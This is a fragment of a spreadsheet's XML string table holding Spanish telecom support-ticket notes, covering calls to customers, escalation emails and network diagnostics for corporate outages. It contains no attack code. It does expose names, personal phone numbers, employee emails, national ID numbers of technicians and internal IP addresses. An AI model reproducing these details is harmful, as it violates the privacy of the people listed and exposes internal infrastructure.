    <t>CHRISTIAN MORALES/CLIENTE CONSULTA AVANCES, SE PIDE APOYO A MIGUEL RODRÍGUEZ/GESTOR N1; EN TRIPARTITA ÉSTOS, ESTÁN GESTIONANDO EL CASO, EN ESPERA DE LO QUE DETERMINEN.</t>
  </si>
  <si>
    <t>F4571228</t>
  </si>
  <si>
    <t>NO SE VALIDA QUE ESTE PENDIENTE POR PARTE DEL CL NO HAY PRUEBAS EL ULTIMO CAMBIO FUE EN EL HORARIO 09:44:58 FAVOR DE BRINDAR INFORMACIÓN DE QUE ES LO QUE TIENE PENDIENTE AL CLIENTE Y ASÍ BRINDAR EL APOYO, SE CAMBIA DE ESTADO.</t>
  </si>
  <si>
    <t>F4571231</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE  YANCI GALLO 78606185  CONFIRMA QUE EL SERVICIO ESTA ACTIVO, SE PROCEDE AL CIERRE DEL TICKET
1001220799
COLA:
NOMBRE: A: 0050378606185
NÚMERO: 0050378606185
ESTADO: CONECTADA
DURACIÓN: 0:00:31
DETALLES: 0050378606185
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSEGODINEZ
FECHA Y HORA LOCALES: 20/05/2022 14:20:40</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE YANCI GALLO 78606185 QUIEN SOLICITA LLAMADA EN 15 MIN
-ID 1001197620 - 1001197821</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 21328501 MENCIONA QUE NO TIENE  INFORMACION SI YA REALIZARON PRUEBAS
-ID 1001197169</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 21328501 MENCIONA QUE ESTARAN REALIZANDO PRUEBAS POR LO  QUE SOLICITA LLAMADA PARA LAS 13:00 HRS
-ID 1001182088</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE YANCI GALLO 78606185 MENCIONA QUE NO ESTA  EN PR POR LO QUE SOLICITA   VALIDAR CON PR  21328501
-ID 1001181184</t>
  </si>
  <si>
    <t>F4571236</t>
  </si>
  <si>
    <t>SE REENVIA CORREO A CLIENTE
DE: ODALIS ANAHI CARDENAS SALAZAR &lt;ODALIS.CARDENAS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 14:41
PARA: SMC RECOVERY AMERICAS BUSINESS SOLUTIONS &lt;SMC.RECOVERY.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; SMC RECOVERY MANAGER AMERICAS BUSINESS SOLUTIONS &lt;SMC.RECOVERYMANAGER.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
CC: YOHAN PRETEL MESA &lt;YOHAN.PRETEL@TELEFONICA.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; WAGNER JOSUE POLANCO SANDOVAL &lt;WAGNER.POLANCO@CLARO.COM.GT&gt;; INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;
ASUNTO: RE: ESCALADO | VISA * GUATEMALA * VISA-GUA-GUA-0003 * CID 1018200 * DOWN * INC000003734443 * SEV 2
*-*-*-*-*</t>
  </si>
  <si>
    <t>F4571244</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ALFREDO CARIAS 59151234 MENCIONA QUE ESTA AFECTANDO LA ENERGIA ELECTRICA
-ID 1001137236</t>
  </si>
  <si>
    <t>F4571246</t>
  </si>
  <si>
    <t>CLEINTE YA UBICO DISPOSITIVOS- SE CAMBIA A ETAPA ANTERIOR ##</t>
  </si>
  <si>
    <t>SE LLAMO A CLIENTE 2 VECES- JUAN LUIS ESCOBAR-52510147 ##3NVIA A BUZON ##SE INTENTARA LUEGO ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMO NUEVAMENTE AL CLIENTE JUAN LUIS ESCOBAR QUIEN INDICA QUE SI ESPERA LA LLEGADA DEL TECNICO.
1001272818, 1001272984.
COLA:
NOMBRE: A: 52510147
NÚMERO: 52510147
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 52510147
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 20/05/2022 17:00:27</t>
  </si>
  <si>
    <t>F4571250</t>
  </si>
  <si>
    <t>CLIENTE ADILIA RAMIREZ 54923594 COMENTA QUE EL E1 YA NO DIO INCONVENIENTES, EL E1 SE OBSERVA ACTIVO Y AETHRA ESTÁ REGISTRADO, CLIENTE AUTORIZA EL CIERRE DEL CASO. FAVOR VALIDAR CON SD A LAS 3 PM. LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL ADILIA RAMIREZ 54923594 ID: 1001161657 INDICA QUE SOLO LE FUNCIONA POR 10MIN Y LUEGO SE VUELVE A QUEDAR SIN SEÑAL, SE CONTACTA A GESTOR SAQITZUNUN.COJTI Y SE DEJA EN CONFERENCIA*/*/*/</t>
  </si>
  <si>
    <t>SE VERIFICÓ EL GDN Y SE TENÍA REGISTRO CRUZADO EN CENTRAL, SE PROCEDIÓ A CORREGIR Y SE OBSERVA EL AETHRA REGISTRADO EN CENTRAL, CLIENTE ADILIA REALIZA PRUEBAS Y YA TIENE LLAMADAS, SE VALIDARÁ DE NUEVO EN 20 MINUTOS.
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-05-20 11:36:03-06:00
O&amp;M    #300523
%%/*1879543748 MEID=005*/EXP USRINF: ENTITYPE=SCSCF,IMPU="TEL:+50266447400";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
               IMPI  =  +50266447400@IMSHWI.CLARO.COM.GT
               IMPU  =  TEL:+50266447400
         SCU NUMBER  =  113
     REGISTER STATE  =  REGISTERED
      REGISTER TIME  =  3600
      RESIDUAL TIME  =  2090
        PATH HEADER  =  &lt;SIP:TERM@CEPCSCF1.IMSHWI.CLARO.COM.GT;LR;SSN;TYPE=V4;IP=10.16.113.250;PORT=34908;DPT=7C42_86&gt;
    CONTACT ADDRESS  =  &lt;SIP:+50266447400@10.16.113.250:34908;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
 AUTHORIZATION TYPE  =  MD5
  USER SUBSCRIBE ID  =  NULL
    USER SESSION ID  =  NULL
         USER AGENT  =  AETHRA TELECOMMUNICATIONS PBX
USER PRIORITY LEVEL  =  4
        IFC UNSAVED  =  NO
  P-CSCF NETWORK ID  =  NULL
(NUMBER OF RESULTS = 1)
---    END
+++    CSCF/*MEID:5 MENAME:GNCYGTAJ_CENTRO_CSCF*/        2022-05-20 11:35:55-06:00
O&amp;M    #300522
%%/*1879543747 MEID=005*/EXP USRINF: ENTITYPE=PCSCF,IMPU="TEL:+50266447400";%%
RETCODE = 0  OPERATION SUCCEEDED
THE RESULT IS AS FOLLOWS:
-------------------------
                      IMPI  =  +50266447400@IMSHWI.CLARO.COM.GT
                      IMPU  =  TEL:+50266447400
                SCU NUMBER  =  113
            REGISTER STATE  =  REGISTERED
             REGISTER TIME  =  3600
             RESIDUAL TIME  =  2097
      SERVICE-ROUTE HEADER  =  &lt;SIP:ORIG@CESCSCF1.IMSHWI.CLARO.COM.GT;LR;DPT=7C44_BF3AD246;CA=FFFFFFFF&gt;
           CONTACT ADDRESS  =  &lt;SIP:+50266447400@10.16.113.250:34908;TRANSPORT=UDP;ANN=FIXED-ACCESS_1&gt;;Q=1.0
         ACCESS NETWORK ID  =  1
USER EQUIPMENT ACCESS TYPE  =  NOT_IMS_UE
         USER SUBSCRIBE ID  =  NULL
           USER SESSION ID  =  NULL
                USER AGENT  =  AETHRA TELECOMMUNICATIONS PBX
       ORIGINAL IP ADDRESS  =  10.78.80.21
               IFC UNSAVED  =  NO
(NUMBER OF RESULTS = 1)
---    END</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE ADALIA RAMIREZ CLIENTE REINICIA EQUIPO AETHRA 6044 Y SE OBSERVA QUE EL EQUIPO YA SE REGISTRA, CLIENTE REALIZA PRUEBAS Y VALIDA QUE YA TIENE LLAMADAS, SOLICITA SE VALIDE EN 1 HORA EN LO QUE REALIZA PRUEBAS.
CSITETEXPIA_321700005\VOIP&gt;SHOW STATUS -S
RESOURCE                AVAILABLE  MAXIMUM
TRUNK SIP CONNECTIONS :        75       76
DSP                   :         8        8
DSP MODULE            :        29       30
CURRENT TRUNK SIP CONNECTIONS = 1 (MAX TRUNK SIP CONNECTIONS = 76)
STATUS OF SIP
TRUNK-NAME            CONFIG.  USERNAME                         REGISTRATION-STATUS                     REGISTRATION-HOST                              REFRESH   REG.TIME
SIP-CTEXPIA           ENABLE   +50266447400                     REGISTERED                              10.16.246.231:5060                             2205      20 MAY 2022 11:12:57
STATUS OF ISDN-PRI-LINE-1
CONFIGURATION STATUS : ENABLE
LOGICAL STATUS       : USED INTO INBOUNDLIST,OUTBOUNDLIST
B1 CHAN. CALL STATUS : INCOMING RINGING
DSP MEDIA            : CLOSED</t>
  </si>
  <si>
    <t>F4571253</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE LUIS NAVARRO 51552078  MENCIONA QUE SE QUEMO EL CONTADOR  POR LO QUE NO  CUENTAN CON ENERGIA
-ID 1001120901</t>
  </si>
  <si>
    <t>F4571271</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL LUIS AUGUSTO GOMEZ MONTANO ID: 1001180135 ATIENDE PABLO MORALES, INDICA QUE YA LO VEN ESTABLE Y SOLICITA QUE SE DEJE EN MONITOREO HASTA LAS 18:00 HRS*/*/*/*SE NOTIFICA A GESTORA YENSI.CALGUA Y CAMBIA DE ESTADO*/*/*/</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE--
RE: INC23331614 - COCA COLA FEMSA-COSTA RICA-GUAPILES-DISTRIBUIDORA - ID: ONTR0001286888OC</t>
  </si>
  <si>
    <t>F4571286</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A DENNIS SICA/CLIENTE, SE LE INDICA QUE YA SE TIENE EL NOMBRE DE LOS TÉCNICOS QUE ATENDERÁN; CLIENTE PIDE SE LE ENVIÉ ESTOS DATOS POR CORREO, NOMBRE/DPI; SE INFORMA DE LO ANTERIOR A CNOC CLARO VÍA SKYPE.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE CON LAS ACCIONES CORRECTIVAS
DE: KEVIN ISMAEL GUERRA MALDONADO &lt;KEVIN.GUERRA@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 17:35
PARA: JOSE DAVID RAMIREZ STAMBUK &lt;JOSEDAV.RAMIREZ@CLARO.COM.GT&gt;; 'MARLON PERALTA' &lt;MPERALTA@GTC.COM.GT&gt;; OMAR ANTONIO CABRERA DE LA ROCA &lt;OMAR.CABRERA@CLARO.COM.GT&gt;; GUSTAVO ADOLFO GUERRA MORAN &lt;GUSTAVO.GUERRA@CLARO.COM.GT&gt;
CC: KANDY KRYSTINA CORONADO RAMON &lt;KANDY.CORONADO@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; 'DENIS SICA' &lt;DSICA@GTC.COM.GT&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; PABLO MIGUEL ERNESTO JUAREZ HERNANDEZ &lt;PABLOM.JUAREZ@CLARO.COM.GT&gt;; DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; 'INCIDENTES INFRAESTRUCTURA' &lt;IPINFRA@GTC.COM.GT&gt;; 'ASI CC TELECOMUNICACIONES' &lt;CCTELECOMUNICACIONES@GTC.COM.GT&gt;; 'DIEGO FERNANDO DIAZ' &lt;DIDIAZ@GTC.COM.GT&gt;
ASUNTO: RE: ENLACE CAIDO ID 7800096 AG068 JOYABAJ
BUENAS TARDES ESTIMADOS,
EN BASE A LO CONVERSADO EN LA SESIÓN DE TEAMS SE DETECTO INTERMITENCIA A NIVEL DE CLARO EN EL SERVICIO DE JOYABAJ, PARA ELLO SE TRASLADÓ NUESTRO PERSONAL TÉCNICO TANTO A NODO COMO AGENCIA REMOTO Y SE REALIZARON LAS SIGUIENTES ACCIONES CORRECTIVAS:
SE CAMBIO CONECTOR RJ-45 EN EL CABLE DE RED EL CUAL CONECTA EN EL EQUIPO DE ACCESO EN NUESTRO NODO.
A NIVEL DE MEDIO (COBRE) SE REALIZARON MEDICIONES, ENCONTRANDO UNA DEGRADACIÓN A 530 MTS LA CUAL SE SOLVENTA CAMBIANDO EL CABLE DEL PUENTE Y CAMBIO DE PAR EN EL ESPEJO DE NUESTRO NODO.
ADICIONAL NUESTRO PERSONAL ENCONTRÓ LOS EQUIPOS DE CLARO CON ALTA TEMPERATURA DEBIDO A QUE NO HAY UNA VENTILACIÓN ADECUADA PARA EL ÓPTIMO FUNCIONAMIENTO (SE ADJUNTAN FOTOS).
SE REACONDICIONO EL CABLEADO EN LOS EQUIPOS DE CLARO DE LA AGENCIA LOS CUALES SE ENCONTRABAN ENREDADOS Y ALGUNOS SE CONECTORES SE ENCONTRABAN FLOJOS.
CON DICHAS ACCIONES VEMOS DE NUEVO LA ESTABILIDAD EN EL SERVICIO.
RESPECTO AL SEGUNDO INCONVENIENTE SE VALIDA QUE EL SEGMENTO 10.112.1.64/30 SE CONOCE CORRECTAMENTE DESDE LA CENTRAL Y ALCANZAMOS CON ÉXITO NUESTRO EQUIPO (10.112.1.66) SIN EMBARGO SU EQUIPO AZA (10.112.1.65)  NO LO LOGRAMOS ALCANZAR POR LO CUAL SE PODRÍA TRATAR DE UN PROBLEMA CON EL EQUIPO FÍSICO O PROBLEMA LÓGICO SIN EMBARGO DICHO EQUIPO TAMPOCO ES ALCANZADO DE MOMENTO DE SU LADO Y QUEDA PENDIENTE EL REEMPLAZO DEL MISMO.</t>
  </si>
  <si>
    <t>SE CONTACTA EL CL DENIS SICA PARA EL SEGUIMIENTO DEL TICKET SD1126338 SE LE BRINDA LA INFORMACIÓN EN EL QUE COMENTA QUE YA RESPONDIÓ EL CORREO PERO NO NOS FIGURA Y COMENTA  QUE HAY AFECTACIÓN POR LO QUE SE TRANSFIERE CON EL GESTOR LUVY SANDOVAL ID 1001157224 PERO ATIENDE JOSE OCHOA Y TRANSFIERE CON EL GESTOR  WILIAM SANDOVAL QUIEN COMENTA QUE NO TIENE INFORMACIÓN YA QUE ESTA INGRESANDO A TURNO Y TRANSFIERE NUEVAMENTE CON LUVY SANDOVAL, DEJA EN ESPERA Y NO RETOMA. SE LIBERA.
ID: 1001157224
NOMBRE: A: WILLIAMS GABRIEL SANAVRIA
NÚMERO: 5302
DURACIÓN: 0:08:48
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 5302
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: GUSTAVO.BARAHONA
FECHA Y HORA LOCALES: 20/05/2022 11:28:46
SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID 1001161124 TRASNFIERE AL GESTOR  WARNER POLANCO Y SE LE BRINDA LA INFORMACIÓN Y SE TRANSFIERE CON EL CL  SE DEJA EN LINEA.</t>
  </si>
  <si>
    <t>SE CUENTA CON VENTANA DE MANTENIMIENTO CON CLIENTE DENIS</t>
  </si>
  <si>
    <t xml:space="preserve">
EN CONFERENCIA CON CLIENTE DENIS, Y CONSULTOR DOMINGO, REALIZANDO VALIDANCIONES SOBRE EL SERVICIO
1001230603
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4818
DURACIÓN: 0:01:09
ESTADO: CONECTADA
DETALLES: 4818
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUAN.LOPEZS
FECHA Y HORA LOCALES: 20/05/2022 14:51:32</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA LA AUTORIZACION DE PERMISOS DEL PERSONAL TECNICO
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 13:45
PARA: DENIS SICA &lt;DSICA@GTC.COM.GT&gt;; ITINFRA@GTC.COM.GT &lt;ITINFRA@GTC.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: SIN SERVICIO|| 7800096T || BANCO G&amp;T CONTINENTAL || BARRIO CENTRAL FRENTE AL PARQUE JOYABAJ QUICHE AGENCIA 68
BUENA TARDE
ESTIMADO CLIENTE POR ESTE MEDIO SOLCITO SU APOYO, PARA LA GESTIÓN DE PERMISOS NECESARIOS PARA PERSONAL TÉCNICO CON RESPECTO AL SERVICIO REPORTADO CON EL IID: 7800096T  , UBICADO EN BARRIO CENTRAL FRENTE AL PARQUE JOYABAJ QUICHE AGENCIA 68   ,ADJUNTO DATOS DEL PERSONAL TÉCNICO.
GONZALEZ JUAREZ, DANY ALEXANDER   DPI: 1635475481403
LUIS DARÍO VELÁSQUEZ RODRÍGUEZ                DPI: 3260 97023 1401
    QUEDAMOS ATENTOS A SUS COMENTARIOS
¡SALUDOS CORDIALES!</t>
  </si>
  <si>
    <t>SE ENVIA LINK POR CORREO AL CLIENTE PARA LA SESION DE TEAMS
DE: JUAN CARLOS LOPEZ SANCHEZ &lt;JUAN.LOPEZS@CLARO.COM.GT&gt;
ENVIADO: VIERNES, 20 DE MAYO DE 2022 15:00
PARA: DENIS SICA &lt;DSICA@GTC.COM.GT&gt;; ITINFRA@GTC.COM.GT &lt;ITINFRA@GTC.COM.GT&gt;
CC: CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SIN SERVICIO|| 7800096T || BANCO G&amp;T CONTINENTAL || BARRIO CENTRAL FRENTE AL PARQUE JOYABAJ QUICHE AGENCIA 68
BUENA TARDE
ESTIMADO DENIS SICA, CON RESPECTO AL SERVICIO REPORTADO, LE COMPARTO EL LINK DE LA VENTANA DE MANTENIMIENTO, ESTAREMOS, LA SESIÓN ESTÁ PROGRAMADA EN 5 MINUTOS.
HTTPS://TEAMS.MICROSOFT.COM/L/MEETUP-JOIN/19:G17WDJZDG6XDNRIM5X0F_BSW4YF0WTZBG662F_MAO081@THREAD.TACV2/1653080182046?CONTEXT=%7B%22TID%22:%224A261F89-8EC8-47CB-9E42-747C3EB3757F%22,%22OID%22:%22FD34866C-02EA-4495-88BE-E314ED76916D%22%7D
JOIN CONVERSATION
TEAMS.MICROSOFT.COM
SALUDOS CORDIALES.</t>
  </si>
  <si>
    <t>F4571293</t>
  </si>
  <si>
    <t>SE REENVÍA CORREO A CLIENTE SOLICITÁNDOLE APOYO CON TELS DE PR PARA CONTINUAR SEGUIMIENTO DEL TICKET, EN ESPERA DE RESPUESTA DE ÉSTE.</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE PARA NOTIFICAR LA ALARMA DEL SERVICIO
JUAN PABLO MORALES BARRONDO
VIE 20/05/2022 10:05 A.M.
ELEMENTOS ENVIADOS; BANDEJA DE ENTRADA
PARA:
JOSE.GAITAN@WALMART.COM;
CAM-CCINFR@WAL-MART.COM;
CNOCCA;
FONSECA BUSTAMANTE, KEVYN ANTON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1293¿
ID: CONTR0001566129OC¿
IDENTIFICADOR DEL CLIENTE: CC_WALMART_CR_TIENDA_3144
CONTIGUO AL BANCO POPULAR DE FLORENCIA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIO.
SALUDOS.</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE.
JURGEN RENE BOCH CAAL
BUEN DÍA,
ESTIMADO CLIENTE, SOLICITAMOS SU APOYO BRINDÁNDONOS LOS DATOS DE PERSONAL EN LA AGENCIA PARA REALIZAR PRUEBAS DE PRIMER NIVEL, QUEDAMOS A LA ESPERA DE SUS COMENTARIOS.
SALUDOS.
.</t>
  </si>
  <si>
    <t>SE PASA A CCR PARA VISITA TECNICA, SE ENVIA INFORMACION EN COLA DE CORREOS
JOSE ANTONIO FERNANDEZ CABRERA
ESTIMADO CLIENTE DANDO SEGUIMIENTO AL INCIDENTE REPORTADO, SE ASIGNA AL SIGUIENTE PERSONAL TÉCNICO QUIEN ESTARÁ LLEGANDO A LAS INSTALACIONES APROXIMADAMENTE EN 1 HORA PARA LO CUAL LLEGARÁ DEBIDAMENTE IDENTIFICADO, COMPARTIMOS LOS DATOS DEL MISMO PARA SU AUTORIZACIÓN.
EL TÉCNICO QUE HARÁ LA VISITA EN LA TIENDE DE WALMART 3144 ES:
NORBERTO MOLINA ROJAS
CEDULA DE IDENTIDAD # 110190008
FAVOR TRAMITAR LOS PERMISOS
SALUDOS
JOSE ANTONIO FERNANDEZ CABRERA
GESTOR DE CLIENTE CORPORATIVOS CNO</t>
  </si>
  <si>
    <t>A ESPERA DE CONFIRMACION DE ACCESOS POR PARTE DE CLIENTE</t>
  </si>
  <si>
    <t>POR TIEMPOS ACUMULADOS
TABLA DE ESCALAMIENTO COSTA RICA				
	WO OPEN                                			7:40:00
1/4	INGENIERO DE IM 	7002-8958	2 HORAS	9:40:00
2/4	MARCO SALAZAR 	7002-0778	3 HORAS	10:40:00
3/4	GILBERTO FERNANDEZ	7002-9441	5 HORAS	12:40:00
4/4	LUIS IVAN ORTIZ	7002-5268	6 HORAS	13:40:00</t>
  </si>
  <si>
    <t>F4571294</t>
  </si>
  <si>
    <t>NO SE VALIDA QUE ESTE PENDIENTE POR EL CLIENTE Y NO TIENE MOVIMIENTO DESDE LAS 09:55:07  COMPAÑEROS FAVOR DE INFORMAR QUE ES LO PENDIENTE PARA PODER APOYAR CON EL PR, ESTADO NO CORRESPONDE SE CAMBIA DE ESTADO.</t>
  </si>
  <si>
    <t>F4571305</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MADAI VASQUEZ 79103444 MENCIONA QUE PERSISTE EL INCONVENIENTE,SE  NOTIFICARA PARA EL SEGUIMIENTO
-ID 1001179803 - 1001180021</t>
  </si>
  <si>
    <t>MADAI VASQUEZ 79103444 ENCUENTRA ENFRENTE DE LOS EQUIPOS, NOS COMENTA QUE UBICO EL ASMI 54L EL CUAL ESTA ALARMADO DE LA SIGUIENTE FORMA
PWR - VERDE
ALM - ROJO
SYNC - ROJO
CLIENTE NOS APOYA CON EL REINICIO PERO PERSISTE  LAS ALARMAS.
CON APOYO DE MARIAIGODINEZ SE INGRESA A SW 10.154.110.170 EN DONDE INTERFAZ SE ENCUENTRA ACTIVA
GE0/2/26(100M)                UP      UP       IPPBX22057600/GRICENTER/SAPOSVZSN1D1ENA1/G0_2_26/V3095/3M(MODEMS)
POSIBLE DAÑO EN UM</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE MADAI VASQUEZ 79103444
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4571330</t>
  </si>
  <si>
    <t>CLIENTE GLENDA DUARTE-77306525 INDICA QUE LOS EQUIPOS ESTAN BAJO LLAVE + QUE EN 1 HORA SE LE CONTACTE- DEBIDO A QUE BUSCARA A LA PERSONA QUE TIENE AUTORIZACION Y LA LLAVE PARA MANPULAR EQUIPOS ##VIVO</t>
  </si>
  <si>
    <t>SE LLAMA AA CLIENTE GLENDA DUARTE-77306525 ##VIVO ##SE TIENEE N LINEA-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE GLENDA DUARTE-77306525 ## COEMNTA QUE APLICO REINICIO A MODEM Y SERVICOI RESTABLECIO, VALIDA CIERRE ##
1001167538
COLA:
NOMBRE: A: 0050377306525
NÚMERO: 0050377306525
DURACIÓN: 0:00:19
ESTADO: CONECTADA
DETALLES: 0050377306525
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: MARIAI.GODINEZ
FECHA Y HORA LOCALES: 20/05/2022 11:46:22
&lt;TSANSVZ3N1D1EID1&gt;PING -C 1500 -S 1500 -M 30 -B -VPN-INSTANCE IP_PBX 10.165.213.34
  PING 10.165.213.34: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!.!!!!!!!.!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!.!!!.!!!!!!!.!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!.!!!!!!!!!!!!!!!!!!!!!..!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!..!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!!!.!!!!!!!!!!!!!!!!!!!!!!!!!.!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!.!
  --- 10.165.213.34 PING STATISTICS ---
    1159 PACKET(S) TRANSMITTED
    1136 PACKET(S) RECEIVED
    1.98% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 31/31/42 MS
&lt;TSANSVZ3N1D1EID1&gt;</t>
  </si>
  <si>
    <t>F4571338</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE NELMAN 33993636 PERO ENVIA DIRECTO A BUZON, SE INTENTARA LUEGO
-ID 1001229299</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE NELMAN 33993636 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001155974 - 1001155937</t>
  </si>
  <si>
    <t>F4571342</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 504 2280-4000 EXT. 1 NO RESPONDE, SE INTENTARA LUEGO
-ID 1001256039</t>
  </si>
  <si>
    <t>F4571353</t>
  </si>
  <si>
    <t>CLIENTE ELI SANCHEZ UBICA EQUIPO ETX-1 EL CUAL SE ENCUENTRA ALARMADO, PROCEDE A REINICIARLO PERO CONTINUA EN EL MISMO ESTADO. SE ABRIRÁ WO</t>
  </si>
  <si>
    <t>CLIENTE ELI SANCHEZ 95125510 COMENTA QUE EL INCONVENIETE INICIÓ HACE DOS DIAS, SE LE SOLICITA APOYO PARA UBICAR LOS EQUIPOS, CLIENTE SE DIRIGE A DONDE ESTAN LOS EQUIPOS</t>
  </si>
  <si>
    <t>F4571360</t>
  </si>
  <si>
    <t>*/*/*/SE LLAMA AL CLIENTE DE LA CENTRAL DIEGO URAÑAS +506 83414335 ID: 1001198755 INDICA QUE ESTA EN UNA REUNION, SE LE INFORMA QUE EN EL PR DESCONOCEN EL CASO, INDICA QUE SE CIERRE EL TICKET*/*/*/SE NOTIFICA A GESTORA MONICA.CASTILLO Y SE CAMBIA DE ESTADO*/*/*/*</t>
  </si>
  <si>
    <t>SE LLAMA AL GDN LA LLAMADA COMPLETA
SE MANTIENE EN MONITOREO LOS E1 DEL CLIENTE, VALIDANDO QUE NO HAN PRESENTADO ALARMAS.
SE INTENTA COMUNICAR NUEVAMENTE CON MILCO ARESTI 59221507 PERO SIGUE ENVIANDONOS A BUZON, PARA VALIDAR QUE ESTAN REPORTANDO
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
